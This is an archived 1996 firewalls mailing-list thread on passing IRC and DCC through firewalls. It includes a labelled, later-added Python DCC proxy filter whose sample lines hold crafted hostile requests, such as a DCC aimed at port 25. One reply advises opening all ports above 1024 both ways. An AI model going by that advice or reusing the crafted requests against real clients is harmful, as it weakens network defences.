From firewalls-owner Sun Jul 7 12:37:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA00659 for firewalls-outgoing; Sun, 7 Jul 1996 12:30:52 -0700 (PDT) Received: from lapsene.mii.lu.lv (lapsene.mii.lu.lv [159.148.60.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA00651 for ; Sun, 7 Jul 1996 12:30:45 -0700 (PDT) Received: (from uulda@localhost) by lapsene.mii.lu.lv (8.7.5/8.7.1) id WAA05162 for firewalls@greatcircle.com; Sun, 7 Jul 1996 22:28:09 +0300 (EET DST) X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f >Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: from lda by lapsene.mii.lu.lv; Sun, 7 Jul 1996 22:28 EET Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: by lda.gov.lv (FIDO2UU 1.92d [DOS]); To: firewalls@greatcircle.com From: Uldis Bojars Message-Id: <31E03DDB@lda.gov.lv> Subject: OS/2 firewall Date: Sun, 7 Jul 1996 18:44:43 +0200 Lines: 20 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Saturday July 06 1996 16:19, dnewman@mcgraw-hill.com wrote to Uldis Bojars:

d> Actually, I'm not even sure their firewall really runs on OS/2.
d> The Web page talks about OS/2 agents, which makes me wonder if it's
d> really an NT firewall with a Socks-like client for OS/2. Has anyone
d> actually touched Netguard's OS/2 code?

I just received a message from them telling me that a trial version for OS/2 is now available on the Web, too. I'm eager to try it. I think it must be like the WinNT version. Has anyone touched it and can comment on it?

Uldis

My life is still in BETA test.
--- GoldED/386 3.00.Alpha1+

From firewalls-owner Sun Jul 7 13:49:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA03390 for firewalls-outgoing; Sun, 7 Jul 1996 13:32:48 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA03383 for ; Sun, 7 Jul 1996 13:32:43 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id PAA12190; Sun, 7 Jul 1996 15:30:04 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id PAA01767; Sun, 7 Jul 1996 15:23:04 -0500 Received: by sonic.nmti.com; id AA06247; Sun, 7 Jul 1996 15:23:03 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607072023.AA06247@sonic.nmti.com.nmti.com> Subject: Re: IRC and Firewalls To: mazzoni@infogroup.iunet.it (Iacopo Mazzoni) Date: Sun, 7 Jul 1996 15:23:03 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <1.5.4.32.19960707160658.00665988@infogroup.it> from "Iacopo Mazzoni" at Jul 7, 96 06:06:58 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> but my DCC commands (send and chat) are not ok because firewall cut this
> commands.

Good. DCC is a humongous security risk.
From firewalls-owner Sun Jul 7 14:20:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA05045 for firewalls-outgoing; Sun, 7 Jul 1996 14:14:36 -0700 (PDT) Received: from gatekeeper.nytimes.com (gatekeeper.nytimes.com [199.181.175.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA05033 for ; Sun, 7 Jul 1996 14:14:29 -0700 (PDT) Received: from mailgate.nytimes.com by gatekeeper.nytimes.com; (5.65/1.1.8.2/30Mar95-0352PM) Received: from localhost by mailgate.nytimes.com; (5.65/1.1.8.2/25Jul94-1134AM) Date: Sun, 7 Jul 1996 17:15:39 -0400 (EDT) From: Gordy Thompson To: Peter da Silva Cc: Iacopo Mazzoni , firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: <9607072023.AA06247@sonic.nmti.com.nmti.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Do you think you could elaborate on this just a bit? In particular, assuming that there is a desire to relay IRC through a firewall (and without arguing the validity of that desire, for the moment at least), is there any approach that could be taken to reduce this risk, short of just not allowing it at all? On Sun, 7 Jul 1996, Peter da Silva wrote: > > but my DCC commands (send and chat) are not ok because firewall cut this > > commands. > > Good. DCC is a humungous security risk. > > -- Gordon T. Thompson gordy@nytimes.com Manager, Internet Services 212-556-1386 The New York Times fax: 212-556-1636 The Times and I have an arrangement: Neither of us speaks for the other. 
From firewalls-owner Sun Jul 7 14:49:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA05754 for firewalls-outgoing; Sun, 7 Jul 1996 14:42:55 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA05747 for ; Sun, 7 Jul 1996 14:42:49 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id QAA15535; Sun, 7 Jul 1996 16:40:06 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id QAA03725; Sun, 7 Jul 1996 16:32:12 -0500 Received: by sonic.nmti.com; id AA06761; Sun, 7 Jul 1996 16:32:11 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607072132.AA06761@sonic.nmti.com.nmti.com> Subject: Re: IRC and Firewalls To: gordy@nytimes.com (Gordy Thompson) Date: Sun, 7 Jul 1996 16:32:11 -0500 (CDT) Cc: peter@baileynm.com, mazzoni@infogroup.iunet.it, firewalls@GreatCircle.COM In-Reply-To: from "Gordy Thompson" at Jul 7, 96 05:15:39 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Do you think you could elaborate on this just a bit? In > particular, assuming that there is a desire to relay IRC through a > firewall (and without arguing the validity of that desire, for the moment > at least), is there any approach that could be taken to reduce this risk, > short of just not allowing it at all? First of all, DCC can be from any port to any port. It's a point-to-point connection between clients bypassing the IRC network completely, so you'd have to write a proxy that grokked the protocol and pretended to be the client, like the FTP proxies do, and ran on the firewall... or open up a huge range of ports. Second, it's way open to "social engineering" attacks. 
That's as big a problem as the technical one.

From firewalls-owner Sun Jul 7 15:19:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA07402 for firewalls-outgoing; Sun, 7 Jul 1996 15:07:49 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA07373 for ; Sun, 7 Jul 1996 15:07:40 -0700 (PDT) Message-Id: <199607072207.PAA07373@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: IRC and Firewalls To: mazzoni@infogroup.iunet.it (Iacopo Mazzoni) Date: Mon, 8 Jul 1996 08:04:49 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <1.5.4.32.19960707160658.00665988@infogroup.it> from "Iacopo Mazzoni" at Jul 7, 96 06:06:58 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

In some mail from Iacopo Mazzoni, sie said:
>
> Hi all.
> I need your help.
> I use for IRC the program MIRC 4.0 32 bit for Windows 95.
> My provider have installed on server a firewall.
> In the beginning my MIRC was not ok with firewall, so , my provider have
> ability port 6667 in firewall and now my MIRC is ok,
> but my DCC commands (send and chat) are not ok because firewall cut this
> commands.
>
> What must my provider ability in firewall for the good function of DCC
> commands ?

Allowing DCC to work requires that any TCP connection be able to connect from outside to inside or inside to outside, i.e. there is almost no point in having a firewall. The most reliable way is to use a proxy which can also initiate proxies for DCC connections when it recognises them being set up.
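Peter da Silva and Darren Reed above both point at the same alternative to opening a port range: a proxy on the firewall that understands the DCC handshake and permits exactly the one connection it announces, the way an FTP proxy does for data connections. As an added example (not code from any poster in this thread), the Python below parses a CTCP DCC SEND/CHAT request out of a raw IRC PRIVMSG line and works out the single TCP pinhole that request implies: the peer named in the request listens on the advertised address and port, and the other peer connects to it, so if the listener is outside, an inside client is about to connect out, and if it is inside, an outside peer is about to connect in. The sample lines, the 10.0.0.0/8 "inside" network, and the policy thresholds (no privileged ports, inbound only when explicitly allowed) are this example's assumptions.

```python
"""Protocol-aware DCC handling for an IRC proxy (added example, not from the thread).
Parses CTCP DCC SEND/CHAT requests out of raw IRC PRIVMSG lines and works out the
single TCP pinhole the firewall would need for the client-to-client connection."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

CTCP = "\x01"
# [:<nick>!<user>@<host>] PRIVMSG <target> :\x01DCC <kind> <arg> <ip> <port> [<size>]\x01
# <ip> is the listener's IPv4 address written as one unsigned 32-bit decimal number.
_DCC_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:" + CTCP
    + r"DCC\s+(?P<kind>SEND|CHAT)\s+(?P<arg>\S+)\s+(?P<ip>\d+)\s+(?P<port>\d+)"
    + r"(?:\s+(?P<size>\d+))?\s*" + CTCP
)


@dataclass(frozen=True)
class DccRequest:
    sender: str                 # nick that is listening and will be connected to
    target: str                 # nick that is expected to make the TCP connection
    kind: str                   # "SEND" or "CHAT"
    argument: str               # filename for SEND, the literal "chat" for CHAT
    ip: ipaddress.IPv4Address   # advertised listener address
    port: int                   # advertised listener port
    size: Optional[int]         # file size for SEND, None for CHAT


def parse_dcc(line: str) -> Optional[DccRequest]:
    """Return the DCC request carried by one IRC line, or None if there is none
    or its address/port fields are not representable."""
    m = _DCC_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    ip_int, port = int(m.group("ip")), int(m.group("port"))
    if ip_int > 0xFFFFFFFF or not 0 < port <= 0xFFFF:
        return None
    prefix = m.group("prefix") or ""
    size = m.group("size")
    return DccRequest(sender=prefix.split("!", 1)[0], target=m.group("target"),
                      kind=m.group("kind"), argument=m.group("arg"),
                      ip=ipaddress.IPv4Address(ip_int), port=port,
                      size=int(size) if size is not None else None)


@dataclass(frozen=True)
class Decision:
    action: str                                  # "open" or "refuse"
    reason: str
    direction: Optional[str] = None              # "outbound": inside client connects out
    ip: Optional[ipaddress.IPv4Address] = None   # "inbound": outside peer connects in
    port: Optional[int] = None


def decide_pinhole(req: DccRequest, inside_nets: List[ipaddress.IPv4Network],
                   allow_inbound: bool = False) -> Decision:
    """Work out the one TCP connection a DCC request implies and whether to permit it.
    The sender listens on req.ip:req.port and the target connects to it. The policy
    thresholds here (no privileged ports, no inbound unless allowed) are assumptions
    of this example, not part of the DCC protocol."""
    if req.ip.is_unspecified or req.ip.is_loopback or req.ip.is_multicast:
        return Decision("refuse", "advertised address is not a usable unicast host")
    if req.port < 1024:
        # A DCC "listener" on a well-known port is a way to make the victim's client
        # connect to some other service, not a real peer.
        return Decision("refuse", "advertised port is privileged")
    if any(req.ip in net for net in inside_nets):
        if not allow_inbound:
            return Decision("refuse", "inside client offered DCC; inbound not allowed")
        return Decision("open", f"{req.target} connects in to {req.sender}",
                        "inbound", req.ip, req.port)
    return Decision("open", f"{req.target} connects out to {req.sender}",
                    "outbound", req.ip, req.port)


def process(lines: List[str], inside_nets: List[ipaddress.IPv4Network],
            allow_inbound: bool = False) -> List[Optional[Decision]]:
    """Run every line through the parser; lines carrying no valid DCC request give None."""
    return [None if (r := parse_dcc(ln)) is None
            else decide_pinhole(r, inside_nets, allow_inbound) for ln in lines]


# Constructed sample traffic, not captured from any real network. 3221226219 is
# 192.0.2.235 and 167838211 is 10.1.2.3 as unsigned 32-bit decimals.
SAMPLE_LINES = [
    ":alice!a@example.net PRIVMSG bob :\x01DCC SEND notes.txt 3221226219 4000 1024\x01",
    ":bob!b@10.1.2.3 PRIVMSG alice :\x01DCC CHAT chat 167838211 5555\x01",
    ":mallory!m@example.org PRIVMSG bob :\x01DCC CHAT chat 3221226219 25\x01",
    ":carol!c@example.org PRIVMSG bob :hello there",
    ":eve!e@example.org PRIVMSG bob :\x01DCC SEND evil.exe 99999999999 4000\x01",
]
INSIDE_NETS = [ipaddress.IPv4Network("10.0.0.0/8")]   # assumed "inside" address space

if __name__ == "__main__":
    for line, decision in zip(SAMPLE_LINES, process(SAMPLE_LINES, INSIDE_NETS)):
        print(repr(line), "->", decision)
```

The pinhole a real proxy would open is stateful and short-lived: one destination, one port, closed again once the DCC connection is established or times out. Run with the defaults, the first sample line is the normal case (an outside user offers a file; the inside client connects out to 192.0.2.235:4000), the second is refused because it would need an inbound hole, the third is refused because port 25 is not a plausible DCC listener, and the last two carry no usable request at all.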
From firewalls-owner Sun Jul 7 16:05:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA12693 for firewalls-outgoing; Sun, 7 Jul 1996 15:50:06 -0700 (PDT) Received: from sapa.inka.de (sapa.inka.de [193.197.84.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA12681 for ; Sun, 7 Jul 1996 15:49:58 -0700 (PDT) Received: from uu.inka.de (root@[193.197.84.8]) by sapa.inka.de Received: from lina (ecki@lina.inka.de) by uu.inka.de Received: by lina Message-Id: From: ecki@lina.inka.de (Bernd Eckenfels) Subject: Re: IRC and Firewalls To: firewalls@GreatCircle.COM Date: Mon, 8 Jul 1996 00:45:54 +0200 (MET DST) In-Reply-To: from "Gordy Thompson" at Jul 7, 96 05:15:39 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

> Do you think you could elaborate on this just a bit? In
> particular, assuming that there is a desire to relay IRC through a
> firewall (and without arguing the validity of that desire, for the moment
> at least), is there any approach that could be taken to reduce this risk,
> short of just not allowing it at all?

Yes, you could use SOCKSified clients or intelligent firewalls which will dynamically open ports for DCC by understanding the CTCP request to open a connection. (Linux ip_masquerade seems to have IRC support.) This is the same problem as with FTP. You might be able to use outgoing DCC in some conditions, though.
Greetings Bernd From firewalls-owner Sun Jul 7 23:19:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA28912 for firewalls-outgoing; Sun, 7 Jul 1996 23:17:49 -0700 (PDT) Received: from gatekeeper.nytimes.com (gatekeeper.nytimes.com [199.181.175.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA28905 for ; Sun, 7 Jul 1996 23:17:42 -0700 (PDT) Received: from mailgate.nytimes.com by gatekeeper.nytimes.com; (5.65/1.1.8.2/30Mar95-0352PM) Received: from localhost by mailgate.nytimes.com; (5.65/1.1.8.2/25Jul94-1134AM) Date: Mon, 8 Jul 1996 02:18:50 -0400 (EDT) From: Gordy Thompson To: firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: <9607072132.AA06761@sonic.nmti.com.nmti.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 7 Jul 1996, Peter da Silva wrote: > First of all, DCC can be from any port to any port. It's a point-to-point > connection between clients bypassing the IRC network completely, so you'd > have to write a proxy that grokked the protocol and pretended to be the > client, like the FTP proxies do, and ran on the firewall... or open up a > huge range of ports. > > Second, it's way open to "social engineering" attacks. That's as big a > problem as the technical one. Understood, and thanks. Evidently DCC isn't part of "standard IRC" (if there is such a thing). Leaving DCC aside, are there known application-specific vulnerabilities in IRC itself? Assume that the protocol itself can be securely relayed through the firewall (via UDP Relay, perhaps, or a custom-built relay) and leave aside "social engineering" threats like sweet-talking a user into executing a bunch of commands. Are the interior hosts running IRC clients (or even those that aren't) still exposed to risks? 
Is it possible, for example, to read or alter data on the client host via the IRC connection itself, even if the user is operating the client in a "safe" manner? I know a lot depends on the particular implementation of application software, but we're just beginning to explore this issue and I'm looking for anything I can find out. Are there particular implementations of IRC client s/w that are thought to be especially dangerous to use? Are there any that _aren't?_ -- Gordon T. Thompson gordy@nytimes.com Manager, Internet Services 212-556-1386 The New York Times fax: 212-556-1636 The Times and I have an arrangement: Neither of us speaks for the other. From firewalls-owner Mon Jul 8 00:34:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA02400 for firewalls-outgoing; Mon, 8 Jul 1996 00:28:44 -0700 (PDT) Received: from mail.marben.com (losgatos.marben.com [206.86.34.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id AAA02386 for ; Mon, 8 Jul 1996 00:28:37 -0700 (PDT) Received: (from girsch@localhost) From: girsch@marben.com (Arnaud Girsch) Message-Id: <199607080726.AAA28540@mail.marben.com> Subject: Re: IRC and Firewalls To: gordy@nytimes.com (Gordy Thompson) Date: Mon, 8 Jul 1996 00:26:02 -0700 (PDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Gordy Thompson" at Jul 8, 96 02:18:50 am X-Organization: Marben Products, Inc. X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Understood, and thanks. Evidently DCC isn't part of "standard IRC" > (if there is such a thing). See RFC 1459 : "Internet Relay Chat Protocol - J. Oikarinen/D. Reed - May 1993" Arnaud. -- Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc. 
- San Jose, CA

From firewalls-owner Mon Jul 8 00:49:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA01921 for firewalls-outgoing; Mon, 8 Jul 1996 00:21:42 -0700 (PDT) Received: from reference.be (ss5.reference.be [194.111.181.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id AAA01907 for ; Mon, 8 Jul 1996 00:21:33 -0700 (PDT) Received: by reference.be (SMI-8.6/SMI-SVR4) Date: Mon, 8 Jul 1996 09:18:02 +0200 (MET DST) From: Kristof Van Damme X-Sender: aeneas@ss5 To: Gordy Thompson cc: firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Mon, 8 Jul 1996, Gordy Thompson wrote:

> Understood, and thanks. Evidently DCC isn't part of "standard IRC"
> (if there is such a thing). Leaving DCC aside, are there known
> application-specific vulnerabilities in IRC itself?

You never know. I wouldn't risk it on a Unix system, for instance. It's not impossible that via a bug in, say, ircii 2.8, an outsider might be able to run shell commands on the machine behind the firewall, and then of course you've got a problem (well, actually the whole firewall becomes meaningless then ;-). Does anyone know about any security risks in mirc, virc or ws-irc?
Greetings, Aeneas

From firewalls-owner Mon Jul 8 01:34:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA08689 for firewalls-outgoing; Mon, 8 Jul 1996 01:30:16 -0700 (PDT) Received: from mail.marben.com (losgatos.marben.com [206.86.34.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id BAA08581 for ; Mon, 8 Jul 1996 01:29:56 -0700 (PDT) Received: (from girsch@localhost) From: girsch@marben.com (Arnaud Girsch) Message-Id: <199607080827.BAA28622@mail.marben.com> Subject: Re: IRC and Firewalls To: aeneas@ss5.reference.be (Kristof Van Damme) Date: Mon, 8 Jul 1996 01:27:12 -0700 (PDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Kristof Van Damme" at Jul 8, 96 09:18:02 am X-Organization: Marben Products, Inc. X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> > Understood, and thanks. Evidently DCC isn't part of "standard IRC"
> > (if there is such a thing). Leaving DCC aside, are there known
> > application-specific vulnerabilities in IRC itself?
> You never know. I wouldn't risk it on a unix system for instance. It's not
> impossible that via a bug in, say ircii 2.8, an outsider might be able to run
> shell commands on the machine behind the firewall and then of course you got
> a problem (well, actually the whole firewall becomes meaningless then
> ;-).

The most widespread bug in ircII is a *human*. I mean, someone is using IRC, someone else tells him to grab some script of some sort and load it. 80% of the users do it. This script can be nothing, but it can also be something that grabs some file on the system and sends it through e-mail. Or many, many other things.

Arnaud.
-- Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc.
- San Jose, CA From firewalls-owner Mon Jul 8 04:19:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA15424 for firewalls-outgoing; Mon, 8 Jul 1996 04:09:06 -0700 (PDT) Received: from amsterdam.holding.pi.net (amsterdam.holding.pi.net [145.220.65.41]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA15416 for ; Mon, 8 Jul 1996 04:08:56 -0700 (PDT) Received: from localhost (niels@localhost) by amsterdam.holding.pi.net (8.6.13/8.6.12) with SMTP id MAA03081; Mon, 8 Jul 1996 12:49:45 +0200 Date: Mon, 8 Jul 1996 12:49:45 +0200 (MDT) From: Niels To: Iacopo Mazzoni cc: firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: <1.5.4.32.19960707160658.00665988@infogroup.it> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 7 Jul 1996, Iacopo Mazzoni wrote: > What must my provider ability in firewall for the good function of DCC > commands ? DCC (Direct Client-to-Client) does not use any assigned port number. It binds to the first free port. So your provider should open all ports above 1024, both incoming and outgoing. Niels ---------------------------------------------------------------------- Planet Internet Holding XXTP Support Engineer I do not speak for my employer - they are perfectly able to do that. 
From firewalls-owner Mon Jul 8 08:04:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23693 for firewalls-outgoing; Mon, 8 Jul 1996 07:54:23 -0700 (PDT) Received: from magneto.acquion.com (magneto.acquion.com [206.154.17.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA23685 for ; Mon, 8 Jul 1996 07:54:17 -0700 (PDT) Received: from wolverine.acquion.com ([206.154.17.12]) Message-Id: <2.2.32.19960708145142.006dc0ac@mail.acquion.com> X-Sender: oolid@mail.acquion.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 08 Jul 1996 10:51:42 -0400 To: firewalls@greatcircle.com From: oolid@acqic.org (Joseph L. Moll) Subject: Re: IRC and Firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 12:49 PM 7/8/96 +0200, you wrote:
>On Sun, 7 Jul 1996, Iacopo Mazzoni wrote:
>
>> What must my provider ability in firewall for the good function of DCC
>> commands ?
>
>DCC (Direct Client-to-Client) does not use any assigned port number.
>It binds to the first free port. So your provider should open all ports
>above 1024, both incoming and outgoing.
>

Actually... This is what happens. It is not what you would expect.

Two machines: IRC-A with nic-a and IRC-B with nic-b. Both machines are connected to IRC servers (not necessarily the same one, BTW), which log the IRC nick and IP address of the client.

For example: nic-a initiates a DCC call to nic-b. To accomplish this, nic-a tells the IRC server that it wants to initiate the session to nic-b. The IRC server then uses its already established connection to IRC-B and tells nic-b that nic-a wants to initiate a session, then IRC-B initiates the CONNECTION to IRC-A. Catch the triangle forming here?
 A ----> Server -----> B          A ----> Server A -----> Server B ----> B
 ^                     |    or    ^                                      |
 +--<----<----<----<---+          +---<----<----<----<----<----<----<----+

This is the worst possible case WRT security because this allows a type of "hijacking" or "trusted host spoofing" built right in to the protocol. If you allow IRC clients to talk to IRC servers, and allow those same clients to initiate outgoing TCP connections, you are breached. In this case, however, IRC-B will not be able to complete the initiation of a session with IRC-A since IRC-A will be attempting to initiate a connection to a machine behind your firewall.

In short, a machine outside your firewall can cause a machine inside your firewall to contact it as long as it is connected to the IRC server via the DCC connection protocol. Once connected via DCC, files can be exchanged, etc.

--- Joseph L. (Joe) Moll, Greenville, SC USA mailto:oolid@acqic.org

From firewalls-owner Mon Jul 8 08:37:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA24640 for firewalls-outgoing; Mon, 8 Jul 1996 08:19:56 -0700 (PDT) Received: from ACML.COM ([206.218.249.66]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA24620 for ; Mon, 8 Jul 1996 08:19:46 -0700 (PDT) Received: from smtpngw.acml.com by ACML.COM (SMI-8.6/SMI-SVR4) Received: by smtpngw.acml.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA1757; Mon, 08 Jul 96 11:17:25 -0400 Message-Id: <9607081517.AA1757@smtpngw.acml.com> Received: from ACML with "Lotus Notes Mail Gateway for SMTP" id To: Firewalls-Digest Cc: firewalls-digest From: Rey.LeClerc/New.York/ACMC Date: 8 Jul 96 11:16:43 Subject: Re: Firewalls-Digest V5 #407 X-Lotus-Type: Reply to _All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

The following are interesting Internet security sites:

Telnet Access to Internet Sites
gopher csrc.ncsl.nist.gov (NIST BBS - security bulletins & numerous security audit
references)

Useful WWW Servers
http://www.alw.nih.gov/~jbk/security.html (UNIX security information)
http://crimelab.com/bugtraq/bugtraq.html (UNIX/Bugtraq archive)
http://www.cs.purdue.edu (extensive security archive/mirror site)
http://csrc.ncsl.nist.gov (NIST Information Security Clearinghouse)
http://ww01.dhmc.dartmount.edu (Dartmouth Internal Audit BBS)
http://www.openmarket.com/info/internet-index/current.html (Internet Facts)
http://www.dct.ac.uk/www/books/hacker-crackdown/hacker.html (Hacker Crackdown book)
http://www-ns.rutgers.edu/www-security/reference.html (Rutgers WWW Security Reference page)
http://www.tansu.com.au/Info/security.html (security reference index)
http://www.spy.org (spy BBS)
http://www.uhsa.uh.edu/issa

FTP Sites
csrc.ncsl.nist.gov (NIST security FTP server)
decuac.dec.com (routers, firewalls and UNIX tools)
ftp.cisco.com (routers and firewalls)
ftp.eff.org (Computer Underground Digest)
ftp.greatcircle.com (firewalls)
ftp.sunet.se (numerous UNIX & TCP/IP security resources)
ftp.sura.net (numerous UNIX & TCP/IP security resources)
ftp.uu.net (numerous UNIX & TCP/IP security resources; USENIX)
info.cert.org (security bulletins, checklist, security tools, VIRUS-L)
nasirc.nasa.gov (NASA security bulletins)
net.tamu.edu (firewalls & UNIX security tools)
nisca.asc.ohio-state.edu (firewalls)
nist.ncsl.nist.gov (NIST BBS - security bulletins & numerous security/audit references)
research.att.com (firewalls)
theta.iis.utokyo.ac.jp:/pub1/securiy (security tools and information)
thumper.bellcore.com (numerous UNIX & TCP/IP security resources)
tis.com (firewalls)
ftp.win.tue.nl (numerous UNIX & TCP/IP security tools and references, including SATAN)

Security/Audit Related Usenet Groups
alt.2600
alt.2600.debate
alt.2600.moderated
alt.2600.QnA
alt.business.internal-audit
alt.crackers
alt.cyberbunk.alliance
alt.hacker
alt.hackers
alt.hackers.discuss
alt.security
alt.security.pgp
alt.security.ripem
alt.sysadm.recovery
comp.protocols.kerberos
comp.risks
comp.security.announce
comp.security.misc
comp.security.unix
comp.unix.admin
comp.unix.wizards
comp.virus
info.pem.dev
misc.security
phl.2600
sci.scrypt

Security Mailing Lists/E-mail Servers
2600@well.sf.ca.us (hacker related information)
bugtraq-request@crimelab.com (UNIX security exposures)
cert-advisory-request@cert.org (security bulletins)
cert-tools-request@cert.org (security tools forum)
docserver@csrc.ncsl.nist.gov (NIST document mail server)
mailserv@ds.internic.net (primary Internet RFC repository, *****see below*****)
majordomo@alive.ampr.ab.ca (subscribe Hack-L: The Hack Report, Hacker alerts)
majordomo@GreatCircle.com (firewalls digest) indicate "subscribe firewall_digest"
phrack@well.sf.ca.us (hacker related information)
risk-request@CSL.SRI.COM (RISKS digest)
listserv@lehigh.edu (urgent virus warnings)
listserv@lehigh.edu (discussion group on virus)

Useful Internet RFCs
RFC1038 Draft Revised IP Security Option
RFC1108 Security Options for the Internet
RFC1244 Site Security Handbook
RFC1352 Security Protocols
RFC1446 Security Protocols
RFC1455 Physical Link Security
RFC1535 Security Problems
RFC1579 Firewall-Friendly FTP

These are just some RFCs to give you a flavor. There are many others.
To get RFCs send E-Mail to: mailserv@ds.internic.net
document-by-name-above RFCXXXX

